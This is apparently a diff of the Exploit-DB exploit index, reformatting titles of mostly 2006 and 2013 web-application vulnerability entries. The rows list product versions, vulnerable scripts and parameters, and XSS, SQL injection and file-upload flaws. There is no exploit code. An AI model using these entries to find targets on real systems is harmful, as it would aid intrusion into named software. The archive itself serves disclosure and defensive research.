+27264,platforms/php/webapps/27264.txt,"Dragonfly CMS 9.0.6 1 News Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps,0 +27265,platforms/php/webapps/27265.txt,"Dragonfly CMS 9.0.6.1 Stories_Archive Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps,0 +27266,platforms/php/webapps/27266.txt,"Dragonfly CMS 9.0.6.1 Web_Links Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps,0 +27267,platforms/php/webapps/27267.txt,"Dragonfly CMS 9.0.6.1 Surveys Module - Multiple Cross-Site Scripting Vulnerabilities",2006-02-22,Lostmon,php,webapps,0 27268,platforms/php/webapps/27268.txt,"Dragonfly CMS 9.0.6.1 Downloads Module - c Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 27269,platforms/php/webapps/27269.txt,"Dragonfly CMS 9.0.6.1 Coppermine Module - album Parameter Cross-Site Scripting",2006-02-22,Lostmon,php,webapps,0 27494,platforms/php/webapps/27494.txt,"phpMyFamily 1.4.1 - Track.php Cross-Site Scripting",2006-03-28,matrix_killer,php,webapps,0 -27495,platforms/php/webapps/27495.txt,"PHPCOIN 1.2 - mod_print.php fs Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 -27496,platforms/php/webapps/27496.txt,"PHPCOIN 1.2 - mod.php fs Parameter Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 +27495,platforms/php/webapps/27495.txt,"PHPCOIN 1.2 - 'mod_print.php?fs' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 +27496,platforms/php/webapps/27496.txt,"PHPCOIN 1.2 - 'mod.php?fs' Cross-Site Scripting",2006-03-28,r0t,php,webapps,0 27272,platforms/php/webapps/27272.txt,"SocialEngine Timeline Plugin 4.2.5p9 - Arbitrary File Upload",2013-08-02,spyk2r,php,webapps,0 -27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php rang' Parameter SQL Injection",2013-08-02,Raw-x,php,webapps,0 +27274,platforms/php/webapps/27274.txt,"Ginkgo CMS - 'index.php?rang' SQL Injection",2013-08-02,Raw-x,php,webapps,0 27275,platforms/php/webapps/27275.txt,"FunGamez - Arbitrary File Upload",2013-08-02,cr4wl3r,php,webapps,0 27276,platforms/php/webapps/27276.html,"BigACE 2.7.8 - Cross-Site Request Forgery (Add Admin)",2013-08-02,"Yashar shahinzadeh",php,webapps,0 27279,platforms/php/webapps/27279.txt,"vTiger CRM 5.4.0 SOAP - Multiple Vulnerabilities",2013-08-02,EgiX,php,webapps,0 -27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php page_name' Parameter SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 +27281,platforms/php/webapps/27281.txt,"Telmanik CMS Press 1.01b - 'pages.php?page_name' SQL Injection",2013-08-02,"Anarchy Angel",php,webapps,0 27283,platforms/hardware/webapps/27283.txt,"D-Link DIR-645 1.03B08 - Multiple Vulnerabilities",2013-08-02,"Roberto Paleari",hardware,webapps,0 27284,platforms/hardware/webapps/27284.txt,"INSTEON Hub 2242-222 - Lack of Web and API Authentication",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 27286,platforms/hardware/webapps/27286.txt,"MiCasaVerde VeraLite 1.5.408 - Multiple Vulnerabilities",2013-08-02,"Trustwave's SpiderLabs",hardware,webapps,0 @@ -29707,34 +29708,34 @@ id,file,description,date,author,platform,type,port 27290,platforms/php/webapps/27290.txt,"WordPress Plugin Better WP Security - Persistent Cross-Site Scripting",2013-08-02,"Richard Warren",php,webapps,0 27291,platforms/windows/webapps/27291.txt,"Oracle Hyperion 11 - Directory Traversal",2013-08-02,"Richard Warren",windows,webapps,19000 27298,platforms/php/webapps/27298.txt,"Web Calendar Pro - Dropbase.php SQL Injection",2006-02-23,ReZEN,php,webapps,0 -27299,platforms/php/webapps/27299.txt,"NOCC 1.0 - error.php html_error_occurred Parameter Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 -27300,platforms/php/webapps/27300.txt,"NOCC 1.0 - filter_prefs.php html_filter_select Parameter Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 -27301,platforms/php/webapps/27301.txt,"NOCC 1.0 - no_mail.php html_no_mail Parameter Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 -27302,platforms/php/webapps/27302.txt,"NOCC 1.0 - html_bottom_table.php Multiple Parameter Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 +27299,platforms/php/webapps/27299.txt,"NOCC 1.0 - 'error.php?html_error_occurred' Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 +27300,platforms/php/webapps/27300.txt,"NOCC 1.0 - 'filter_prefs.php?html_filter_select' Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 +27301,platforms/php/webapps/27301.txt,"NOCC 1.0 - 'no_mail.php?html_no_mail' Cross-Site Scripting",2006-02-23,rgod,php,webapps,0 +27302,platforms/php/webapps/27302.txt,"NOCC 1.0 - 'html_bottom_table.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-23,rgod,php,webapps,0 27303,platforms/php/webapps/27303.txt,"Oi! Email Marketing System 3.0 - 'index.php' SQL Injection",2006-02-23,h4cky0u,php,webapps,0 27304,platforms/php/webapps/27304.html,"CubeCart 3.0.x - Arbitrary File Upload",2006-02-23,"NSA Group",php,webapps,0 27305,platforms/php/webapps/27305.txt,"PHPX 3.5.9 - XCode Tag HTML Injection",2006-02-23,"Thomas Pollet",php,webapps,0 -27306,platforms/php/webapps/27306.txt,"JGS-Gallery 4.0 - jgs_galerie_slideshow.php Multiple Parameter Cross-Site Scripting",2006-02-23,nuker,php,webapps,0 -27307,platforms/php/webapps/27307.txt,"JGS-Gallery 4.0 - Board jgs_galerie_scroll.php userid Parameter Cross-Site Scripting",2006-02-23,nuker,php,webapps,0 +27306,platforms/php/webapps/27306.txt,"JGS-Gallery 4.0 - 'jgs_galerie_slideshow.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-23,nuker,php,webapps,0 +27307,platforms/php/webapps/27307.txt,"JGS-Gallery 4.0 - 'Board jgs_galerie_scroll.php?userid' Cross-Site Scripting",2006-02-23,nuker,php,webapps,0 27308,platforms/php/webapps/27308.txt,"myPHPNuke 1.8.8 - 'reviews.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27309,platforms/php/webapps/27309.txt,"myPHPNuke 1.8.8 - 'download.php' Cross-Site Scripting",2006-02-22,"Mustafa Can Bjorn",php,webapps,0 27310,platforms/asp/webapps/27310.txt,"Battleaxe Software BttlxeForum 2.0 - Failure.asp Cross-Site Scripting",2006-02-25,rUnViRuS,asp,webapps,0 27311,platforms/php/webapps/27311.txt,"SPiD 1.3.1 - 'Scan_Lang_Insert.php' Local File Inclusion",2006-02-25,"NSA Group",php,webapps,0 27312,platforms/php/webapps/27312.txt,"FreeHostShop Website Generator 3.3 - Arbitrary File Upload",2006-02-25,"NSA Group",php,webapps,0 -27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 - 'basket.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 -27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple Parameter SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 +27313,platforms/php/webapps/27313.txt,"DCI-Taskeen 1.03 - 'basket.php' Multiple SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 +27314,platforms/php/webapps/27314.txt,"DCI-Taskeen 1.03 - 'cat.php' Multiple SQL Injections",2006-02-25,Linux_Drox,php,webapps,0 27315,platforms/php/webapps/27315.txt,"RiteCMS 1.0.0 - Multiple Vulnerabilities",2013-08-03,"Yashar shahinzadeh",php,webapps,0 27318,platforms/php/webapps/27318.txt,"PHP-Nuke 7.8 - Mainfile.php SQL Injection",2006-02-25,waraxe,php,webapps,0 27320,platforms/hardware/webapps/27320.txt,"Thomson SpeedTouch 500 Series - LocalNetwork Page name Parameter Cross-Site Scripting",2006-02-25,"Preben Nylokken",hardware,webapps,0 27321,platforms/php/webapps/27321.txt,"Fantastic News 2.1.1 - SQL Injection",2006-02-27,SAUDI,php,webapps,0 -27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_index.php 'Username' Parameter Cross-Site Scripting",2006-02-27,botan,php,webapps,0 +27322,platforms/php/webapps/27322.txt,"Woltlab Burning Board 1.1.1/2.x - 'galerie_index.php?Username' Cross-Site Scripting",2006-02-27,botan,php,webapps,0 27323,platforms/php/webapps/27323.txt,"Woltlab Burning Board 1.1.1/2.x - galerie_onfly.php Cross-Site Scripting",2006-02-27,botan,php,webapps,0 27324,platforms/php/webapps/27324.txt,"Archangel Weblog 0.90.2 - Authentication Bypass",2006-02-27,KingOfSka,php,webapps,0 -27327,platforms/php/webapps/27327.txt,"D3Jeeb Pro 3 - fastlinks.php catid Parameter SQL Injection",2006-02-25,SAUDI,php,webapps,0 -27328,platforms/php/webapps/27328.txt,"D3Jeeb Pro 3 - catogary.php catid Parameter SQL Injection",2006-02-25,SAUDI,php,webapps,0 -27330,platforms/php/webapps/27330.txt,"n8cms 1.1/1.2 - 'index.php' Multiple Parameter SQL Injection",2006-02-27,Liz0ziM,php,webapps,0 -27331,platforms/php/webapps/27331.txt,"n8cms 1.1/1.2 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0 -27332,platforms/php/webapps/27332.txt,"n8cms 1.1/1.2 - mailto.php userid Parameter Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0 +27327,platforms/php/webapps/27327.txt,"D3Jeeb Pro 3 - 'fastlinks.php?catid' SQL Injection",2006-02-25,SAUDI,php,webapps,0 +27328,platforms/php/webapps/27328.txt,"D3Jeeb Pro 3 - 'catogary.php?catid' SQL Injection",2006-02-25,SAUDI,php,webapps,0 +27330,platforms/php/webapps/27330.txt,"n8cms 1.1/1.2 - 'index.php' Multiple SQL Injections",2006-02-27,Liz0ziM,php,webapps,0 +27331,platforms/php/webapps/27331.txt,"n8cms 1.1/1.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-02-27,Liz0ziM,php,webapps,0 +27332,platforms/php/webapps/27332.txt,"n8cms 1.1/1.2 - 'mailto.php?userid' Cross-Site Scripting",2006-02-27,Liz0ziM,php,webapps,0 27333,platforms/php/webapps/27333.txt,"QwikiWiki 1.4 - 'index.php' Cross-Site Scripting",2006-02-28,Dr^Death,php,webapps,0 27336,platforms/php/webapps/27336.txt,"EJ3 TOPo 2.2.178 - Inc_header.php Cross-Site Scripting",2006-02-28,"Yunus Emre Yilmaz",php,webapps,0 27337,platforms/php/webapps/27337.txt,"Mozilla Thunderbird 1.5 - Multiple Remote Information Disclosure Vulnerabilities",2006-02-28,Crashfr,php,webapps,0 @@ -29744,11 +29745,11 @@ id,file,description,date,author,platform,type,port 27341,platforms/php/webapps/27341.txt,"DCI-Designs Dawaween 1.03 - Poems.php SQL Injection",2006-03-02,sherba,php,webapps,0 27342,platforms/php/webapps/27342.txt,"PluggedOut Nexus 0.1 - forgotten_password.php SQL Injection",2006-03-02,"Hamid Ebadi",php,webapps,0 27343,platforms/php/webapps/27343.txt,"vBulletin 3.0/3.5 - 'profile.php Email' HTML Injection",2006-03-02,imei,php,webapps,0 -27344,platforms/php/webapps/27344.txt,"NZ eCommerce System - 'index.php' Multiple Parameter SQL Injection",2006-03-02,r0t,php,webapps,0 +27344,platforms/php/webapps/27344.txt,"NZ eCommerce System - 'index.php' Multiple SQL Injections",2006-03-02,r0t,php,webapps,0 27345,platforms/php/webapps/27345.txt,"LogIT 1.3/1.4 - Remote File Inclusion",2006-03-02,botan,php,webapps,0 27346,platforms/php/webapps/27346.txt,"VBZoom Forum 1.11 - show.php MainID SQL Injection",2006-03-04,Mr.SNAKE,php,webapps,0 -27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 - comment.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 -27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 - contact.php UserID Parameter Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 +27347,platforms/php/webapps/27347.txt,"VBZooM Forum 1.11 - 'comment.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 +27348,platforms/php/webapps/27348.txt,"VBZooM Forum 1.11 - 'contact.php?UserID' Cross-Site Scripting",2006-03-04,Mr.SNAKE,php,webapps,0 27354,platforms/php/webapps/27354.txt,"Easy Forum 2.5 - New User Image File HTML Injection",2006-03-04,"Aliaksandr Hartsuyeu",php,webapps,0 27355,platforms/php/webapps/27355.txt,"Woltlab Burning Board 2.3.4 - misc.php Cross-Site Scripting",2006-03-04,r57shell,php,webapps,0 27362,platforms/php/webapps/27362.txt,"Bitweaver 1.1/1.2 - 'Title' HTML Injection",2006-03-06,Kiki,php,webapps,0 @@ -29759,11 +29760,11 @@ id,file,description,date,author,platform,type,port 27368,platforms/php/webapps/27368.txt,"LoudBlog 0.41 - 'podcast.php' SQL Injection",2006-03-07,tzitaroth,php,webapps,0 27369,platforms/php/webapps/27369.txt,"LoudBlog 0.41 - 'index.php' template Parameter Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 27370,platforms/php/webapps/27370.txt,"LoudBlog 0.41 - 'backend_settings.php' Traversal Arbitrary File Access",2006-03-07,tzitaroth,php,webapps,0 -27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - deleteuser.php user Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 -27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - viewuser.php hits Parameter Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 +27371,platforms/php/webapps/27371.txt,"HitHost 1.0 - 'deleteuser.php?user' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 +27372,platforms/php/webapps/27372.txt,"HitHost 1.0 - 'viewuser.php?hits' Cross-Site Scripting",2006-03-06,Retard,php,webapps,0 27373,platforms/php/webapps/27373.txt,"TextFileBB 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-08,Retard,php,webapps,0 -27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 - 'search.php keyword' Parameter POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 -27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - 'comments_do.php' Multiple POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 +27374,platforms/php/webapps/27374.txt,"sBlog 0.7.2 - 'search.php?keyword' POST Method Cross-Site Scripting",2006-03-09,Kiki,php,webapps,0 +27375,platforms/php/webapps/27375.txt,"sBlog 0.7.2 - 'comments_do.php' Multiple POST Cross-Site Scripting Vulnerabilities",2006-03-09,Kiki,php,webapps,0 27376,platforms/ios/webapps/27376.txt,"FTP OnConnect 1.4.11 iOS - Multiple Vulnerabilities",2013-08-07,Vulnerability-Lab,ios,webapps,0 27379,platforms/php/webapps/27379.txt,"ADP Forum 2.0.x - 'Subject' HTML Injection",2006-03-09,liz0,php,webapps,0 27380,platforms/php/webapps/27380.txt,"MyBloggie 2.1.2/2.1.3 - 'upload.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 @@ -29773,15 +29774,15 @@ id,file,description,date,author,platform,type,port 27384,platforms/php/webapps/27384.txt,"MyBloggie 2.1.2/2.1.3 - 'edituser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27385,platforms/php/webapps/27385.txt,"MyBloggie 2.1.2/2.1.3 - 'adduser.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27386,platforms/php/webapps/27386.txt,"MyBloggie 2.1.2/2.1.3 - 'editcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'trackback_url' Parameter Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 +27387,platforms/php/webapps/27387.txt,"MyBloggie 2.1.2/2.1.3 - 'trackback_url' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27388,platforms/php/webapps/27388.txt,"MyBloggie 2.1.2/2.1.3 - 'delcat.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 27389,platforms/php/webapps/27389.txt,"MyBloggie 2.1.2/2.1.3 - 'del.php' Cross-Site Scripting",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27390,platforms/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0 -27391,platforms/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - calendar.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0 -27392,platforms/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - forums.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0 -27393,platforms/php/webapps/27393.txt,"DCP-Portal 3.7/4.x/5.x/6.x - inbox.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0 -27394,platforms/php/webapps/27394.txt,"DCP-Portal 3.7/4.x/5.x/6.x - lostpassword.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0 -27395,platforms/php/webapps/27395.txt,"DCP-Portal 3.7/4.x/5.x/6.x - mycontents.php Multiple Parameter Cross-Site Scripting",2006-03-09,"Nenad Jovanovic",php,webapps,0 +27390,platforms/php/webapps/27390.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0 +27391,platforms/php/webapps/27391.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'calendar.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0 +27392,platforms/php/webapps/27392.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'forums.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0 +27393,platforms/php/webapps/27393.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'inbox.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0 +27394,platforms/php/webapps/27394.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'lostpassword.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0 +27395,platforms/php/webapps/27395.txt,"DCP-Portal 3.7/4.x/5.x/6.x - 'mycontents.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0 27396,platforms/php/webapps/27396.txt,"txtForum 1.0.3/1.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-09,"Nenad Jovanovic",php,webapps,0 27398,platforms/php/webapps/27398.txt,"Pluck CMS 4.7 - HTML Code Injection",2013-08-07,"Yashar shahinzadeh",php,webapps,0 27399,platforms/php/webapps/27399.txt,"WordPress Plugin Booking Calendar 4.1.4 - Cross-Site Request Forgery",2013-08-07,"Dylan Irzi",php,webapps,0 @@ -29790,15 +29791,15 @@ id,file,description,date,author,platform,type,port 27405,platforms/php/webapps/27405.txt,"Joomla! Component com_sectionex 2.5.96 - SQL Injection",2013-08-07,"Matias Fontanini",php,webapps,0 27406,platforms/windows/webapps/27406.txt,"McAfee SuperScan 4.0 - Cross-Site Scripting",2013-08-07,"Trustwave's SpiderLabs",windows,webapps,0 27408,platforms/php/webapps/27408.txt,"txtForum 1.0.3/1.0.4 - Remote PHP Script Code Injection",2006-03-09,enji@infosys.tuwien.ac.at,php,webapps,0 -27409,platforms/php/webapps/27409.txt,"QwikiWiki 1.4/1.5 - 'index.php' Multiple Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 -27410,platforms/php/webapps/27410.txt,"QwikiWiki 1.4/1.5 - 'login.php' Multiple Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 -27411,platforms/php/webapps/27411.txt,"QwikiWiki 1.4/1.5 - pageindex.php help Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 -27412,platforms/php/webapps/27412.txt,"QwikiWiki 1.4/1.5 - recentchanges.php help Parameter Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 +27409,platforms/php/webapps/27409.txt,"QwikiWiki 1.4/1.5 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-10,Kiki,php,webapps,0 +27410,platforms/php/webapps/27410.txt,"QwikiWiki 1.4/1.5 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2006-03-10,Kiki,php,webapps,0 +27411,platforms/php/webapps/27411.txt,"QwikiWiki 1.4/1.5 - 'pageindex.php?help' Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 +27412,platforms/php/webapps/27412.txt,"QwikiWiki 1.4/1.5 - 'recentchanges.php?help' Cross-Site Scripting",2006-03-10,Kiki,php,webapps,0 27413,platforms/php/webapps/27413.txt,"Core News 2.0.1 - 'index.php' Remote Code Execution",2006-03-10,botan,php,webapps,0 27414,platforms/php/webapps/27414.txt,"vCard 2.8/2.9 - create.php Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Linux_Drox,php,webapps,0 -27415,platforms/php/webapps/27415.txt,"WMNews - wmview.php ArtCat Parameter Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 -27416,platforms/php/webapps/27416.txt,"WMNews - footer.php ctrrowcol Parameter Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 -27417,platforms/php/webapps/27417.txt,"WMNews - wmcomments.php ArtID Parameter Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 +27415,platforms/php/webapps/27415.txt,"WMNews - 'wmview.php?ArtCat' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 +27416,platforms/php/webapps/27416.txt,"WMNews - 'footer.php?ctrrowcol' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 +27417,platforms/php/webapps/27417.txt,"WMNews - 'wmcomments.php?ArtID' Cross-Site Scripting",2006-03-10,R00T3RR0R,php,webapps,0 27419,platforms/php/webapps/27419.txt,"Vegas Forum 1.0 - Forumlib.php SQL Injection",2006-03-13,"Aliaksandr Hartsuyeu",php,webapps,0 27422,platforms/php/webapps/27422.txt,"CyBoards PHP Lite 1.21/1.25 - post.php SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 27423,platforms/php/webapps/27423.txt,"DSCounter 1.2 - 'index.php' SQL Injection",2006-03-14,"Aliaksandr Hartsuyeu",php,webapps,0 @@ -29813,13 +29814,13 @@ id,file,description,date,author,platform,type,port 27445,platforms/php/webapps/27445.txt,"MusicBox 2.3 - 'index.php' SQL Injection",2006-03-18,Linux_Drox,php,webapps,0 27446,platforms/php/webapps/27446.txt,"MusicBox 2.3 - 'index.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 27447,platforms/php/webapps/27447.txt,"MusicBox 2.3 - 'cart.php' Cross-Site Scripting",2006-03-18,Linux_Drox,php,webapps,0 -27448,platforms/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - friend.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 -27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - article.php sid Parameter SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 +27448,platforms/php/webapps/27448.txt,"phpWebSite 0.8.2/0.8.3 - 'friend.php?sid' SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 +27449,platforms/php/webapps/27449.txt,"phpWebSite 0.8.2/0.8.3 - 'article.php?sid' SQL Injection",2006-03-20,DaBDouB-MoSiKaR,php,webapps,0 27450,platforms/php/webapps/27450.txt,"WinHKI 1.4/1.5/1.6 - Directory Traversal",2006-02-24,raphael.huck@free.fr,php,webapps,0 27451,platforms/cgi/webapps/27451.txt,"Verisign MPKI 6.0 - 'Haydn.exe' Cross-Site Scripting",2006-03-20,"Alberto Soli",cgi,webapps,0 27454,platforms/php/webapps/27454.txt,"Motorola - BlueTooth Interface Dialog Spoofing",2006-03-22,kspecial,php,webapps,0 27455,platforms/cfm/webapps/27455.txt,"1WebCalendar 4.0 - viewEvent.cfm EventID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 -27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - '/news/newsView.cfm' NewsID Parameter SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 +27456,platforms/cfm/webapps/27456.txt,"1WebCalendar 4.0 - '/news/newsView.cfm?NewsID' SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27457,platforms/cfm/webapps/27457.txt,"1WebCalendar 4.0 - mainCal.cfm SQL Injection",2006-03-22,r0t3d3Vil,cfm,webapps,0 27458,platforms/php/webapps/27458.txt,"EasyMoblog 0.5 - Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 27459,platforms/php/webapps/27459.txt,"CoMoblog 1.0 - Img.php Cross-Site Scripting",2006-03-23,FarhadKey,php,webapps,0 @@ -29830,48 +29831,48 @@ id,file,description,date,author,platform,type,port 27466,platforms/php/webapps/27466.txt,"VihorDesign - 'index.php' Remote File Inclusion",2006-03-24,botan,php,webapps,0 27467,platforms/php/webapps/27467.txt,"ConfTool 1.1 - 'index.php' Cross-Site Scripting",2006-03-27,botan,php,webapps,0 27468,platforms/php/webapps/27468.txt,"Nuked-klaN 1.x - 'index.php' SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 -27469,platforms/asp/webapps/27469.txt,"EZHomePagePro 1.5 - email.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27470,platforms/asp/webapps/27470.txt,"EZHomePagePro 1.5 - users_search.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27471,platforms/asp/webapps/27471.txt,"EZHomePagePro 1.5 - users_calendar.asp page Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 - users_profiles.asp Multiple Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27473,platforms/asp/webapps/27473.txt,"EZHomePagePro 1.5 - users_mgallery.asp usid Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 +27469,platforms/asp/webapps/27469.txt,"EZHomePagePro 1.5 - 'email.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 +27470,platforms/asp/webapps/27470.txt,"EZHomePagePro 1.5 - 'users_search.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 +27471,platforms/asp/webapps/27471.txt,"EZHomePagePro 1.5 - 'users_calendar.asp?page' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 +27472,platforms/asp/webapps/27472.txt,"EZHomePagePro 1.5 - 'users_profiles.asp' Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 +27473,platforms/asp/webapps/27473.txt,"EZHomePagePro 1.5 - 'users_mgallery.asp?usid' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27475,platforms/php/webapps/27475.txt,"SaPHPLesson 2.0 - print.php SQL Injection",2006-03-27,Linux_Drox,php,webapps,0 27477,platforms/php/webapps/27477.txt,"Maian Weblog 2.0 - 'print.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27478,platforms/php/webapps/27478.txt,"Maian Weblog 2.0 - 'mail.php' SQL Injection",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 27479,platforms/asp/webapps/27479.txt,"Toast Forums 1.6 - Toast.asp Multiple Cross-Site Scripting Vulnerabilities",2006-03-27,r0t,asp,webapps,0 -27480,platforms/asp/webapps/27480.txt,"Online Quiz System - prequiz.asp exam Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27481,platforms/asp/webapps/27481.txt,"Online Quiz System - student.asp msg Parameter Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 +27480,platforms/asp/webapps/27480.txt,"Online Quiz System - 'prequiz.asp?exam' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 +27481,platforms/asp/webapps/27481.txt,"Online Quiz System - 'student.asp?msg' Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 27482,platforms/asp/webapps/27482.txt,"Caloris Planitia Technologies School Management System 1.0 - Cross-Site Scripting",2006-03-27,r0t,asp,webapps,0 -27483,platforms/php/webapps/27483.txt,"Pixel Motion - admin/index.php Multiple Field SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 +27483,platforms/php/webapps/27483.txt,"Pixel Motion - 'admin/index.php' Multiple SQL Injections",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27484,platforms/php/webapps/27484.txt,"Pixel Motion - 'index.php' date Parameter SQL Injection",2006-03-27,DaBDouB-MoSiKaR,php,webapps,0 27485,platforms/php/webapps/27485.txt,"DSLogin 1.0 - 'index.php' Multiple SQL Injections",2006-03-27,"Aliaksandr Hartsuyeu",php,webapps,0 